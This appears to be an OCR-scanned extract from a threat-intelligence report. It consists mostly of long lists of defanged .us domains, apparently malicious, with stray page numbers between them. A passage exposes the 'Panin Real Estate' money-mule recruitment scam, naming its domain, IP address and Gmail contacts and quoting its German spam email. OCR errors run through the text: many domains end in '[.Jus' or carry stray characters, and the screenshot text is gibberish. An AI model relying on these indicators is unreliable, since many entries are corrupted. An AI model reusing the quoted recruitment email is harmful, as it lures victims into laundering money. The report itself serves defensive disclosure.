hxxp://afterschoolclubs[.]us 
hxxp://freedombands[.]us 
hxxp://petcollect[.]us 
hxxp://healthhappenseverywhere[. ]us 
hxxp://tinylike[.Jus 
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hxxp://tillsfashiontrends[.]us 
hxxp://apointofflight[.]us 
hxxp://abogdadeinmigracion[.]us 
hxxp://thriveinc[.]us 
hxxp://connexusprotection[.]us 
hxxp://authenticnhljerseys[.]us 
hxxp://buffalowholesale[.]us 
hxxp://atredomaine[.]us 
hxxp://alquranacademy[.]us 
hxxp://jacksoncountypark[.]us 
hxxp://theblackwomanisjudas[.]us 
hxxp://lunacounttnm[.]us 
hxxp://healthefaxforms[.]us 
hxxp://clickmagazine[.]us 
hxxp://doctorsaludable[.]us 
hxxp://imageshark[.]us 
hxxp://dreadfulservices[.]us 
hxxp://fragrencebuy[.]us 
hxxp://imputing[.]Jus 
hxxp://gamevaultcareerhunter[. ]us 
hxxp://shiftgrain[.]us 
hxxp://sneakerpagel[.]us 
hxxp://sportscom[.]us 
hxxp://resellgemsfashion[.]us 
hxxp://creativik[.Jus 
hxxp://entprotger[.]us 
hxxp://fortbendtx[.]us 
hxxp://selectormarketing[.Jus 
hxxp://pgiver[.]us 
hxxp://schreyerindustries[.]us 
hxxp://fiercesports[.]us 
hxxp://samanthagarcial[.]us 
hxxp://salvatoregalliano[.]us 
hxxp://semasafya[.]us 


hxxp://designbro[.]us 
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hxxp://mareagift[.Jus 
hxxp://rapslion[.Jus 
hxxp://thealcoholclass[.]us 
hxxp://topdigitalbrands[.]Jus 
hxxp://thewomenstore[.]us 
hxxp://thetapestry[.]us 
hxxp://brandpen[.]us 
hxxp://realestateinnovatio[.]us 
hxxp://powerhouseinc[.]us 
hxxp://triathletestore[.]us 
hxxp://autobeacon[.]us 
hxxp://elaut[.]us 
hxxp://benandmelanie[.]us 
hxxp://excar[.]us 
hxxp://globaltraveler[.Jus 
hxxp://haelthinee[.]us 
hxxp://oncasure[.]us 
hxxp://onesecreminder[.]us 
hxxp://proteesun[.]us 
hxxp://salonrx[.]us 
hxxp://raulsmexicancatering[.]us 
hxxp://simmonsgroupltd[.]us 
hxxp://sonsofsylvial.]us 
hxxp://vacationsfornurses[. ]us 
hxxp://weddingregistryideas[.]us 
hxxp://clearcreekcountry[.]us 
hxxp://levitracheap[.]us 
hxxp://nossaman[.]us 
hxxp://benroethlisbergerjerseys[.]us 
hxxp://drjoelackerman[.]Jus 
hxxp://paganino[.]us 
hxxp://opcfactor[.]us 
hxxp://salonliv[.Jus 
hxxp://solistice[.Jus 
hxxp://calmair[.]us 

26940 


hxxp://vuepoint[.]us 
hxxp://connectorlifestyle[.]us 
hxxp://supplyjerseysonline[.]us 
hxxp://caribo[.]us 
hxxp://chinaowns[.]us 
hxxp://carzy[.]us 
hxxp://chargermagic[.]us 
hxxp://carrub[.]us 
hxxp://chathamanglers[.]us 
hxxp://brilliantbeginnings[.]us 
hxxp://cellphonebag[.]us 
hxxp://howboutchal.]us 
hxxp://hialeahiphonerepairs[.]us 
hxxp://hipnoterapi[.]Jus 
hxxp://flyingweb[.]us 
hxxp://montagemedialive[.]us 
hxxp://movieforu[.]us 
hxxp://sastrainingbysysed[.]us 
hxxp://spinegyml[.]us 
hxxp://surfcycle[.Jus 
hxxp://thegioidotap[.]us 
hxxp://walldewil[.]us 
hxxp://datablock[.]us 
hxxp://ddlanselot[.]us 
hxxp://dcarabajall[.]Jus 
hxxp://envisionretirement[.]us 
hxxp://heilandroofing[.]us 
hxxp://trts[.Jus 
hxxp://wethepeoplelegall[.Jus 
hxxp://thescream[.]us 
hxxp://travelinsuranceland[.]us 
hxxp://westernpharmal[.]us 
hxxp://theamericanstatenationals[.]us 
hxxp://washingtonparkpolice[.]us 


hxxp://waterbury[.]us 
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hxxp://votesong[.]us 
hxxp://tomschott[.]us 
hxxp://tomsoutletstore[.]us 
hxxp://wildhood[.]us 
hxxp://warmonger[.]us 
hxxp://waplink[.]us 
hxxp://redwhiteandcrue[.]us 
hxxp://rapturewatch[.]us 
hxxp://realeyes[.]us 
hxxp://mysponsor[.]us 
hxxp://niagarawaterproofing[.]us 
hxxp://myascention[.]us 
hxxp://raindev[.]Jus 
hxxp://myrokuactivationlink[.]us 
hxxp://nnacomm[.]us 
hxxp://nolprostaff[.]us 
hxxp://othersfirst[.]us 
hxxp://projectstudio[.]us 
hxxp://saratov[.]us 
hxxp://oklahomadirect[.]us 
hxxp://saltwaterspinning[.]us 
hxxp://premierehosting[.]us 
hxxp://pyranol[.]Jus 
hxxp://safehandle[.]us 
hxxp://rugmerchant[.]us 
hxxp://offerdeals[.Jus 
hxxp://plainvillemal[.]Jus 
hxxp://rugcleaningnyc[.]us 
hxxp://rowdigital[.]us 
hxxp://qrcodesrealestate[.]Jus 
hxxp://theisogenics[.]us 
hxxp://tismensclub[.]Jus 
hxxp://toddlerboutique[.]Jus 
hxxp://worldshoes[.]us 
hxxp://webdictionary[.]us 
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Pantin Real Estate 


Panta Real istate. 


Why m Panama vo attractwe Ow Services ! Carvers ! domuy 


Penia Real tstate ©2009 Privacy Police | Terma of vee! Contacts 


Let’s expose some of the bogus brands using these campaigns, whose spamming campaigns 
have been actively recruiting new money mules over the past couple of months. For instance, 
the last template - see attached copy of the original one - is currently being used by a company 
known as Panin Real Estate - panestate .com - 194.0.200.15 - Email: disperswave@gmail.com. 
The site is currently localized to English; Italian (panestate .com/index _it.html); and Spanish 
(panestate .com/index _sp.html). 


It gets even more interesting when we start analyzing their spam campaign, currently 
localized to German. For instance, it appears that the customer of the managed money mule 
recruitment service is using their basic package, since 99 % of their spam emails are using 
Gmail accounts, in fact, one of the spam campaigns is relying on the very same email that 
[9]the domain panestate .com has been registered with - disperswave@gmail.com. 
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hxxp://simmonet[.]us 
hxxp://waterliliesforsale[.]us 
hxxp://supportservicel[.]us 
hxxp://thefurniturestore[.]us 
hxxp://themotolab[.]us 
hxxp://trymaster[.]us 
hxxp://susgarden[.]us 
hxxp://websetpassword[.]us 
hxxp://theoryofevolution[.]us 
hxxp://stewartwhite[.]us 
hxxp://techamerical.]Jus 
hxxp://wariant[.]Jus 
hxxp://travelzwith[.]us 
hxxp://starsandstripessports[.]us 
hxxp://simard[.]Jus 
hxxp://showmydesk[.]us 
hxxp://tredo[.]Jus 
hxxp://statecollagepa[.]us 
hxxp://usedlaptopsforsale[.]us 
hxxp://tracery[.]us 
hxxp://wearenext[.]us 
hxxp://serenadetheco[.]us 
hxxp://tophouseusa[.]us 
hxxp://shannonrenee[.]us 
hxxp://thedoorman[.]us 
hxxp://atip[.]us 
hxxp://colormax{[.]us 
hxxp://aeriesauhsd[.]Jus 
hxxp://bakeryhosting[.]us 
hxxp://andersongroup[.]us 
hxxp://biomedsales[.]us 
hxxp://abreaction[.]us 
hxxp://accredish[.]us 
hxxp://aaronthompson[.]us 


hxxp://benchwarmers[. Jus 
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hxxp://allsql[.Jus 
hxxp://bannerbuz[.]us 
hxxp://cellis[.]us 
hxxp://answeronline[.]Jus 
hxxp://accounton[.]us 
hxxp://aquafinabottlewater[.]us 
hxxp://adventurland[.]us 
hxxp://besteduloan[.]Jus 
hxxp://ajshopil.Jus 
hxxp://allitsolution[.]us 
hxxp://camerastrap[.]us 
hxxp://annuall[.]Jus 
hxxp://carusokarrwedding[.]us 
hxxp://academypro[.]us 
hxxp://charlenecooperhamiltonrealtor[.]us 
hxxp://authentees[.]us 
hxxp://bassearphones[.]us 
hxxp://arlintonhousing[.]us 
hxxp://alpharecruiters[.]us 
hxxp://americanmachinegarage[.]us 
hxxp://guist[.]us 
hxxp://ctureview[.]us 
hxxp://confederateflag[.]Jus 
hxxp://cxpert[.Jus 
hxxp://cubansinamerics[.]us 
hxxp://enternal[.]us 
hxxp://ellenyoung[.]us 
hxxp://fepbluedentall.Jus 
hxxp://condiment[.]us 
hxxp://denturfit[.]us 
hxxp://diamondetails[.]us 
hxxp://gwiegand[.]us 
hxxp://fortherealm[.]us 
hxxp://gwall[.Jus 
hxxp://haringvliet[.]us 

26944 


hxxp://dealoffer[.]us 
hxxp://goyaproductions[.]us 
hxxp://gratomic[.]us 
hxxp://designingtalent[.]us 
hxxp://dealsheaven[.]us 
hxxp://eurodent[.]us 


hxxp://dalemedial[.]us 


hxxp://headsupeducationalconsulting[.]us 


hxxp://fireiseveryonesfight[.]us 
hxxp://cybercleaner[.]us 
hxxp://healthefxfroms[.]us 


hxxp://computerbase[.]us 


hxxp://foldingchairsandtables[.]us 


hxxp://eggshellcafe[.]us 
hxxp://foldablesolar[.]us 
hxxp://fcindiana[.Jus 
hxxp://drdavidcohen|[.]us 
hxxp://diablosrojos[.]us 
hxxp://cotyofvancouver[.]us 
hxxp://cardinalsproshop[.]us 
hxxp://crossjerseys[.]us 
hxxp://cristalpalaceresort[.]us 
hxxp://davesmusic[.]us 
hxxp://herbalizestore[.]us 
hxxp://mattomer[.]us 
hxxp://mankfull[.Jus 
hxxp://tearoma[.]us 
hxxp://alliteampsycleuscas[.]us 
hxxp://minvestments[.]us 
hxxp://chamathbtc[.]us 
hxxp://catct[.Jus 
hxxp://chanyeol[.]us 
hxxp://technologysustain[.]us 
hxxp://casamariposa[.]us 


hxxp://protechtio[.]us 
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hxxp://hiredhands[.]Jus 
hxxp://nissanleaf[.]Jus 
hxxp://bookpeddler[.]us 
hxxp://bmisupply[.]Jus 
hxxp://oosterhousewedding[.]us 
hxxp://betterlandlord[.]Jus 
hxxp://blackliver[.]us 
hxxp://bettea[.]us 
hxxp://carsandtrucks[.]us 
hxxp://daleso[.]us 
hxxp://besttreadmillforhomes[.]Jus 
hxxp://digitalantennal.]us 
hxxp://perirenal[.Jus 
hxxp://pathfindernetwork[.]us 
hxxp://behelp[.]us 
hxxp://bellacinos[.Jus 
hxxp://pdparty[.]Jus 
hxxp://peturo[.]us 
hxxp://northdome[.]us 
hxxp://powerchic[.]us 
hxxp://resistancepac[.]us 
hxxp://poweringroundenergy[.]Jus 
hxxp://pressuastreetwear[.]us 
hxxp://lophealth[.]us 
hxxp://bagklan[.]us 
hxxp://qanmshopl[.]us 
hxxp://pyrometer[.]us 
hxxp://aquawritings[.]us 
hxxp://artistrycouture[.]us 
hxxp://austincitylimits[.]us 
hxxp://reactiondesign[.]us 
hxxp://atlantausedcars[.]us 
hxxp://interviu[.]us 
hxxp://steriluv[.]us 
hxxp://ankorsafe[.]us 

26946 


hxxp://detailworks[.]us 
hxxp://pressurebeauty[.]us 
hxxp://allaboutlouisbyabizia[.]us 
hxxp://seawindsun[.]us 
hxxp://allthatjazzdance[.]us 
hxxp://airportassociates[.]us 
hxxp://aislingfarm[.]us 
hxxp://amgtobacco[.]us 
hxxp://alterationsmaster[.]us 
hxxp://alltruenaturall[. Jus 
hxxp://amateursare[.]us 
hxxp://americanpatch[.]us 
hxxp://ambianceme[.]us 
hxxp://alpacafarm[.]us 
hxxp://anonsocks[.]us 
hxxp://mightykite[.]us 
hxxp://sentiential[.]us 
hxxp://skner[.]us 
hxxp://sensiblerecycling[.]us 
hxxp://shopsaints[.]us 
hxxp://aggielandpowerwashing[.]us 
hxxp://agapejracademy|[.]us 
hxxp://sincerelyanna[.]us 
hxxp://adventurescuba[.]us 
hxxp://adamsmedial[.]us 
hxxp://advancedail.]Jus 
hxxp://supericy[.]Jus 
hxxp://trendygems[.]us 
hxxp://storearc[.]us 
hxxp://stayfact[.]Jus 
hxxp://adamsco[.]us 
hxxp://adminjobs[.]us 
hxxp://aerolinks[.Jus 
hxxp://sxriver[.]us 


hxxp://sturgisrally[.]us 


26947 


hxxp://zinglucy[.]Jus 
hxxp://accesspasswordrecovery[.]us 
hxxp://stabletransit[.]us 
hxxp://thebestfit[.]us 
hxxp://drainbot[.]us 
hxxp://thenerdcave[.]us 
hxxp://timache[.]us 
hxxp://toroscriar[.]us 
hxxp://devendrapatkil.]us 
hxxp://dayistoday[.]Jus 
hxxp://veranohome[.]us 
hxxp://wealthgenerator[.]us 
hxxp://whatarebestmortgageloans[.]us 
hxxp://wellnessconnections[.]us 
hxxp://womenonboards[. ]us 
hxxp://hassy[.]Jus 
hxxp://datacesst[.]us 
hxxp://remediosnaturale[.]us 
hxxp://improveyourhealth[.]us 
hxxp://summrbleeding[.]us 
hxxp://singfamo[.]us 
hxxp://hmanorlodgel[.]us 
hxxp://edragons[.]us 
hxxp://esscore[.]us 
hxxp://cooltoast[.]us 
hxxp://familytraditions[.Jus 
hxxp://drimportir[.Jus 
hxxp://livecometdata[.]us 
hxxp://qnifzymwaj[.]us 
hxxp://streamplay[.]us 
hxxp://swiftsupport[.]us 
hxxp://superplumbingfix[.]us 
hxxp://summermusicconference[.]us 
hxxp://swartandfeliciani[.Jus 
hxxp://teslashoes[.]us 

26948 


hxxp://thinkql[. Jus 
hxxp://thegioixedien[.]us 
hxxp://writesuperessay[.]us 
hxxp://cledara[.]us 
hxxp://muellerinsurance[.]us 
hxxp://ceritaseks[.]us 
hxxp://gofastracing[.]us 
hxxp://ympanamashop[.]us 
hxxp://menonvacation[.]us 
hxxp://negociosonline[.]Jus 
hxxp://projectnimb[.]us 
hxxp://prodialupf[.]us 
hxxp://chelseaartsuitesny[.]us 
hxxp://moviecity[.]us 
hxxp://singzer[.]us 
hxxp://ultralite[.Jus 
hxxp://proxyz[.]us 
hxxp://naturson[.]us 
hxxp://romtest[.]us 
hxxp://goldminesales[.]us 
hxxp://ministeriosdeesperanza[.]us 
hxxp://quentintarantino[.]us 
hxxp://gprspro[.]Jus 
hxxp://kcarrental[.Jus 
hxxp://cardonationinmal[.]us 
hxxp://vigilantarms[.]us 
hxxp://intok[.Jus 
hxxp://foreverbloom[.]us 
hxxp://stepsinc[.]us 
hxxp://comhuaren|[.]us 
hxxp://bombaybazarcharleston[.]us 
hxxp://beraldgroups[.]us 
hxxp://guidepedia[.]us 
hxxp://pollparty[.]us 
hxxp://supinehotels[.]us 
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hxxp://thepiratefilmeshd[.]us 
hxxp://babelphotos[.]us 
hxxp://washingtonbusinesses[.]us 
hxxp://miamipersonalinjuryattorney[.]us 
hxxp://myagentnow[.]us 
hxxp://amitsharma[.]us 
hxxp://wardconstruction[.]us 
hxxp://baltimorepreferred[.]us 
hxxp://alliedfit[.]us 
hxxp://gildedlilygallery[.Jus 
hxxp://leatherboots[.]us 
hxxp://nistarshop[.]us 
hxxp://gpsinc[.]us 
hxxp://slotsforrealmoneyl[.]us 
hxxp://volumemarketing[.]us 
hxxp://buyersadvantagerealty[.]us 
hxxp://agilify[.]us 
hxxp://shopboswell[.]Jus 
hxxp://dallasevictionlaw[.]us 
hxxp://noemotion|[.]us 
hxxp://youmailer[.]us 
hxxp://vilascountywi[.]us 
hxxp://latenightbrass[.]us 
hxxp://marissolutions[.]us 
hxxp://cleanbody[.]us 
hxxp://dignewton|[.]us 
hxxp://aidite[.]us 
hxxp://skindaron[.]us 
hxxp://telcomsystem[.]us 
hxxp://primewaysavings[.]us 
hxxp://uprightbrooms[.]us 
hxxp://raybanoutletsun[.]us 
hxxp://themixedbag[.]us 
hxxp://fortnitoffers[.]us 
hxxp://ultralumino[.]us 

26950 


hxxp://ihateaccenture[.]us 
hxxp://planningahead[.]us 
hxxp://pioneerpreschool[.]us 
hxxp://renewableofsupport[. ]us 
hxxp://wideopenholdings[.]us 
hxxp://venomlettherebecarnage[.]us 
hxxp://cvservices[.]us 
hxxp://allianceservices[.]us 
hxxp://skypechannelpartner[.]us 
hxxp://clashroyalecheats[.]us 
hxxp://ycorn[.Jus 
hxxp://fishscales[.]us 
hxxp://fbstore[.]us 
hxxp://myhairon[.]us 
hxxp://medicaldevicenews[.]us 
hxxp://organano[.]us 
hxxp://queensfashions[.]us 
hxxp://franklincountrync[.Jus 
hxxp://rareantiquerings[.]us 
hxxp://debilitating[.Jus 
hxxp://pearsonintrocommunication[.]us 
hxxp://stickermap[.]us 
hxxp://hottechreviews[.]us 
hxxp://militarygrade[.]us 
hxxp://getalakelife[.]Jus 
hxxp://americantouchl[.]us 
hxxp://asimpleswitch[.]us 
hxxp://bonsaitrees[.]us 
hxxp://ideaspeak[.]us 
hxxp://ksacareers[.]us 
hxxp://williamcruz[.]us 
hxxp://fasttracktoexec[.]us 
hxxp://dvddream|[.]us 
hxxp://renobusiness[.]us 


hxxp://bobparks[.]us 
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hxxp://swedishautowerks[.]us 
hxxp://larsonrainguttersinc[.]us 
hxxp://braziliantouch[.]us 
hxxp://grandrapidsbiz[.]us 
hxxp://panzergruppewest[.]us 
hxxp://theolymptrade[.]us 
hxxp://vitakeraprojsk[.]us 
hxxp://wittencyberconsulting[.]us 
hxxp://almondchip[.]us 
hxxp://bibleinspire[.Jus 
hxxp://antiglarescreen[.]us 
hxxp://dnasticker[.]Jus 
hxxp://latterfromsantasd[.]us 
hxxp://techrader[.]us 
hxxp://rooflite[.]us 
hxxp://incredibleinsider[.]us 
hxxp://steamstatu[.]us 
hxxp://sterlingfinance[.]Jus 
hxxp://hippoexpress[.]us 
hxxp://henrysflorist[.]us 
hxxp://hansonwelding|[.]us 
hxxp://phillyah[.]us 
hxxp://genealogyproject[.]us 
hxxp://superstarz[.]us 
hxxp://nesprofile[.]us 
hxxp://industrypressrelease[.]us 
hxxp://olympicmovers[. ]us 
hxxp://palmair[.]us 
hxxp://palmess[.]us 
hxxp://optimaltraining[.Jus 
hxxp://marionsconstructionweldingllc[.]us 
hxxp://myzestfullife[.Jus 
hxxp://prosteasteratsml[.]us 
hxxp://newappsl[.]us 
hxxp://rankal[.]us 

26952 


Crokmrage services nciude support n 
buyrigibeling 2f shares O° benait cf the 
cm mer 


Trepaperency Of Cepestory sereces: 
mates Pom a. punter te he eteresieny 


Feet ie comvenence ef Assets Trust 
Uerogeret 


OM De Needen we rent 
you more 


Betcome to our Heb site 


Corporate Frasce 


A sample of the spammed recruitment email: 


"Liebe Bewerber! Sind Sie schon mude von solchen Briefchen, in dem man Ihnen einen 
Arbeitsplatz anbietet? Ich weiss das. Deshalb mochte ich zuerst Sie um Verzeihung bitten. Ich 
habe aber eine freie Vakanz und mochte sie Ihnen anbieten. 


Wenn Sie noch keinen Arbeitsplatz gefunden haben, schreiben Sie bitte mir an meine E- 
mail Adresse: Als eine Bestatigung brauche ich auch CV und Ihre Telefonnummer, damit ich 
mich mit Ihnen in Verbindung setzen konnte. Vielen Dank fur Ihre Zeit und Ihr Interesse! Alle 
weiteren Informationen bekommen Sie per E-Mail. Mit freundlichen Grusen" 


Related Gmail accounts used by Panin Real Estate money mule recruitment incorpo- 
rated: 


[10]pancorporate @ gmail.com 


[11]paninwork @ gmail.com 
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hxxp://moonlightandlace[.]us 
hxxp://pristineconstruction[.]us 
hxxp://prusikholding[.Jus 
hxxp://shopculture[.]us 
hxxp://shouyou[.]us 
hxxp://thelynnsite[.]us 
hxxp://thecannabisshack[.]us 
hxxp://visualstylist[.]us 
hxxp://wallpapershd[.]us 
hxxp://theartcollective[.]us 
hxxp://sofasquality[.]us 
hxxp://usajobfinder[.]us 
hxxp://taylorstudios[.]us 
hxxp://stopthechaos[.]us 
hxxp://sportbetohio[.]us 
hxxp://slapiton[.]us 
hxxp://uspassportnow|[.]us 
hxxp://webdogradio[.]us 
hxxp://woodyacers[.]us 
hxxp://tattoofresh[. ]us 
hxxp://wizfinacialservices[.]us 
hxxp://weddingdreamers[. ]us 
hxxp://stylespaces[.]us 
hxxp://ultimatereptiles[.]us 
hxxp://tver[.]us 
hxxp://thekick[.]us 
hxxp://startenddaypodcast[.]us 
hxxp://zenoservice[.]us 
hxxp://foreverknight[.]us 
hxxp://jeopard[.]us 
hxxp://friendsofkurdistan[.]us 
hxxp://cornerstoneacademyl.]us 
hxxp://royalbear[.]us 
hxxp://veteranselance[.]us 


hxxp://glassee[.]us 


26953 


hxxp://beandontownship[.]us 
hxxp://pagriotfront[.]us 
hxxp://justiceforjalin[.]us 
hxxp://sandiegocountygov[.]us 
hxxp://santafeusal[.]us 
hxxp://forcesunsee[.]us 
hxxp://cascon[.]us 
hxxp://sacredheartschoolnewburgh[.]us 
hxxp://icfonline[.Jus 
hxxp://exploringwhileretired[.]Jus 
hxxp://oldgringo[.]Jus 
hxxp://prepaidphonecard[.]us 
hxxp://irenoterlm[.]us 
hxxp://wilehyundail[.]us 
hxxp://marksteylor[.]us 
hxxp://cityofhesperis[.]us 
hxxp://craincommunicationsinc[.]us 
hxxp://epicelement[.]us 
hxxp://diversifiedelectric[.]us 
hxxp://glamorousbeddingdirect[.]us 
hxxp://goldengenes[.]us 
hxxp://nicholshillsguide[.]us 
hxxp://oasco[.]us 
hxxp://synetek[.]us 
hxxp://kitchenpantry[.]Jus 
hxxp://gadgetsology[.]us 
hxxp://celebrityweddings[.]us 
hxxp://lovesoulmate[.]us 
hxxp://ddmbanc[.]us 
hxxp://probioticz[.]us 
hxxp://thefusebox[.]us 
hxxp://weselleverything[.]us 
hxxp://stockclub[.]us 
hxxp://arlibgtonval[.]us 
hxxp://bravenation[.]us 

26954 


hxxp://reebello[.Jus 
hxxp://qigifashionship[.]us 
hxxp://accountsgglasswarehouse[.]us 
hxxp://strongerlinks[.]Jus 
hxxp://thelakeview[.]us 
hxxp://shineteam[.]us 
hxxp://doglicensses[.]us 
hxxp://chefrepubic[.]us 
hxxp://santcruzcounty[.]us 
hxxp://sfgreendevelopment[.]us 
hxxp://daiquiriexpress[.]us 
hxxp://pardonne[.]us 
hxxp://touchbythelight[.]us 
hxxp://akothe[.]us 
hxxp://usavisaexpress[.]us 
hxxp://citylendinginc[.]us 
hxxp://dailyworld[.]us 
hxxp://hypeair[.]us 
hxxp://democraticrenewall.]us 
hxxp://incumbentsout[.]us 
hxxp://findssl[.]us 
hxxp://fton[.Jus 
hxxp://alverno[.]Jus 
hxxp://anandamid[.]us 
hxxp://dueceswildrodeo[.]us 
hxxp://dewaltrobus[.]us 
hxxp://periherall[.]us 
hxxp://inrxsupport[.]us 
hxxp://jamestownsend[.]us 
hxxp://iomengantuk[.]us 
hxxp://kangels[.]us 
hxxp://omau[.]us 
hxxp://pajaris[.]us 
hxxp://threefantastic[.]us 


hxxp://wordoflifeministry[.]us 


26955 


hxxp://moonshineinks[.]us 
hxxp://joelwedsrincyminted[.]us 
hxxp://accuratemedicalbilling[.]us 
hxxp://buytorsemide[.]us 
hxxp://cambridgeclub[.]us 
hxxp://cashinaflash[.]us 
hxxp://cscoh[.]Jus 
hxxp://estrace[.]us 
hxxp://theonet[.]us 
hxxp://kraustile[.]us 
hxxp://swimcalls[.]us 
hxxp://frenchneedle[.]us 
hxxp://thetaxggroup[.]us 
hxxp://changepointchurch[. ]us 
hxxp://bestlawnscapeocalal.]us 
hxxp://aliciacraxton[.]us 
hxxp://anymovenash[.]us 
hxxp://dioptres[.]Jus 
hxxp://judochop[.]us 
hxxp://deformtart[.]us 
hxxp://normansmoteloldorchardbeachl.]us 
hxxp://boisevalleypump|[.]us 
hxxp://crosschurch[.]Jus 
hxxp://fishinggloves[.]Jus 
hxxp://qualityappraisall.]us 
hxxp://ashtontx[.]us 
hxxp://anntaylorstorescorp[.]us 
hxxp://lecrepeavenue[.]us 
hxxp://ampack[.]us 
hxxp://ankerstore[.]us 
hxxp://aboutbowling[.]us 
hxxp://investinhotell[.Jus 
hxxp://eatm[.]Jus 
hxxp://naturequerst[.]us 
hxxp://perfectantenna[.]us 
26956 


hxxp://vulcanogres[.]us 
hxxp://trimmerline[.Jus 
hxxp://thyromine[.]us 
hxxp://jamestownvillage[.]us 


hxxp://learnersg[.Jus 


hxxp://allwellhealthcaresolutions[.]Jus 


hxxp://fourn[.]us 
hxxp://gooochlandval[.]us 
hxxp://thegamblers[.]us 
hxxp://tinkels[.]us 
hxxp://thecxcgroup[.]us 
hxxp://freerides[.Jus 
hxxp://northforty[.]us 
hxxp://artisticalchemy[.]us 
hxxp://nhomedecorpall[.]us 
hxxp://movieshd[.]us 
hxxp://alfaent[.]us 
hxxp://violepro[.Jus 
hxxp://parsep[.]us 
hxxp://accountingandtax[.]us 
hxxp://attractics[.]us 
hxxp://raisingroyalty[.]Jus 
hxxp://waterscop[.]us 
hxxp://cheapredskinsjerseys[.]us 
hxxp://golfcartmikesrentall[.]us 
hxxp://readyrestorationinc[.]us 
hxxp://tigerccshop[.]us 
hxxp://animecybershop[.]us 
hxxp://drinkingfountains[.]us 
hxxp://yahgather[.]us 
hxxp://gopartsonlin[.]us 
hxxp://plazapress[.]us 
hxxp://airjordandstore[.]Jus 
hxxp://walkerlove[.Jus 


hxxp://yogatreestudio[.]us 


26957 


hxxp://puregermanshepher[.]us 
hxxp://timpatrickmusic[.]us 
hxxp://seputartogell.]Jus 
hxxp://minnstatezoom[.]us 
hxxp://consonacorp[.]us 
hxxp://articfoam[.]Jus 
hxxp://visioncatcher[.]us 
hxxp://canarruslaw[.]us 
hxxp://connectm[.]us 
hxxp://proantivir[.]us 
hxxp://abang[.]us 
hxxp://bdrysoutheastmichiganl[. ]us 
hxxp://absolutelyanything[.]us 
hxxp://dixieelectric[.]us 
hxxp://districtcyclestore[.]us 
hxxp://pistar[.]us 
hxxp://arlingtonhouse[.]us 
hxxp://melindadexter[.]us 
hxxp://deliciouspaleorecipes[.]us 
hxxp://livetechsolutions[.]us 
hxxp://clacla[.Jus 
hxxp://desmoinesbiz[.]Jus 
hxxp://dentirefit[.]us 
hxxp://stemobese[.]us 
hxxp://healthlinenutrition[.]us 
hxxp://gradepraver[.]us 
hxxp://customremodelingllc[.]us 
hxxp://anchorinn[.]us 
hxxp://thrivingmompreneurs[.]us 
hxxp://waterdamagesimivalley[.]us 
hxxp://ucumedicine[.]us 
hxxp://zipsearch[.]us 
hxxp://ycsschools[.]us 
hxxp://conuc[.]us 
hxxp://fortniteooffers[.]us 

26958 


hxxp://provesh[.]us 
hxxp://wlld[.]us 
hxxp://beatifulsavior[.]us 
hxxp://hotgirllifestyle[.]Jus 
hxxp://thecirclemotell[.]us 
hxxp://abeyance[.]us 
hxxp://accesszugangsdaten[.]us 
hxxp://referal[.Jus 
hxxp://navajolodgesandiego[.]us 
hxxp://ipadleathercase[.]us 
hxxp://classicedhardy[.]us 
hxxp://candidphoto[.]us 
hxxp://getsiteinfo[.]us 
hxxp://postlesson[.]us 
hxxp://flexiblelifestyle[.]us 
hxxp://jsfoods[.]us 
hxxp://iceboull.Jus 
hxxp://sterlingsilverengraveables[.]us 
hxxp://planple[.Jus 
hxxp://affiliatementor[.]Jus 
hxxp://nsupply[.Jus 
hxxp://babyshock[.]us 
hxxp://majorproductions[.]us 
hxxp://esforsko[.]us 
hxxp://flagtrax[.]us 
hxxp://kindnotes[.]us 
hxxp://quirkycrafter[.]us 
hxxp://superiorfireplace[.]us 
hxxp://affirminspo[.]us 
hxxp://mancusolaw[.]us 
hxxp://perrycountytreasure[.]us 
hxxp://rootman[.]us 
hxxp://urbanailliois[.Jus 
hxxp://techawksecurityproducts[.]us 


hxxp://premierrecovery[.]us 


26959 


hxxp://backrank[.]us 
hxxp://glasscomputerdesk[.]us 
hxxp://byronalexander[.]Jus 
hxxp://myengineeringlabcommunity[.]us 
hxxp://dothefive[.]us 
hxxp://belfone[.]Jus 
hxxp://freevox[.]us 
hxxp://respectthesignall.Jus 
hxxp://storetank[.]us 
hxxp://bikerfriends[.]us 
hxxp://automotivebesttips[.]Jus 
hxxp://stanforddiagnostic[.]us 
hxxp://akufelitesting[.]us 
hxxp://energytec[.]Jus 
hxxp://wholesalebizjerseys[.]us 
hxxp://vestlife[.]us 
hxxp://beefriendlybeecontrol[.]us 
hxxp://vetsjourneyhome[.]us 
hxxp://waterfreedomsystem[.]us 
hxxp://stonefair[.]us 
hxxp://suvresil[.]us 
hxxp://tylovebotique[.]us 
hxxp://twistedreality[.]us 
hxxp://caresol[.]us 
hxxp://vanderpol[.]us 
hxxp://psttonsf[.]Jus 
hxxp://shopshoe[.]us 
hxxp://puertolabocal[.]us 
hxxp://shoesbirkenstock[.]us 
hxxp://seenowdol[.]us 
hxxp://pathorning[.]us 
hxxp://rowheelsinc[.]Jus 
hxxp://ompomp[.]us 
hxxp://oakpointe[.]us 
hxxp://novabossal[.]us 

26960 


hxxp://preferredrealestate[.]us 
hxxp://stepbeauty[.]us 
hxxp://nolanorthshore[.]us 
hxxp://framersworkroomdc[.]us 
hxxp://climaterockford[.]Jus 
hxxp://disrupttrading[.]us 
hxxp://exaltedexistence[.]us 
hxxp://bigballscollective[.]Jus 
hxxp://languagestudio[.]us 
hxxp://borderwait[.]us 
hxxp://petnailgrinder[.]us 
hxxp://bestpimplestreatment[.]us 
hxxp://learndance[.]Jus 
hxxp://hellmouth[.]Jus 
hxxp://grapevinefarms[.]us 
hxxp://labellerose[.]Jus 
hxxp://jeffersoncountyoh[.]Jus 
hxxp://shearenvy[.]us 
hxxp://mainestreaminternet[.]us 
hxxp://tattooreviews[.]us 
hxxp://summitsupplements[.]us 
hxxp://gadgetbay[.]us 
hxxp://freerunningshoes[.]us 
hxxp://colebrew[.]us 
hxxp://genaegis[.]us 
hxxp://accesssupport[.]us 
hxxp://homessearch[.]us 
hxxp://hiuaren[.]us 
hxxp://happilyeveranderson[.]us 
hxxp://nicelyjewell[.]us 
hxxp://nicequest[.]us 
hxxp://guashabeauty|[.]us 
hxxp://holinamet[.]us 
hxxp://juiceheaven[.]us 


hxxp://courtpal.]us 


26961 


hxxp://cheapcarinsuranceris[.]us 
hxxp://commonsensepoliticsblog[.]Jus 
hxxp://doultonwaterfilters[.]us 
hxxp://dueamicicollegepark[.]us 
hxxp://baileyscountrygraphics[.]us 
hxxp://cityorvancouver[.]us 
hxxp://bellacouture[.]Jus 
hxxp://bettafishcare[.]us 
hxxp://eventwil[.]us 
hxxp://coux[.]us 
hxxp://fullhealthy[.]us 
hxxp://irockblin[.]us 
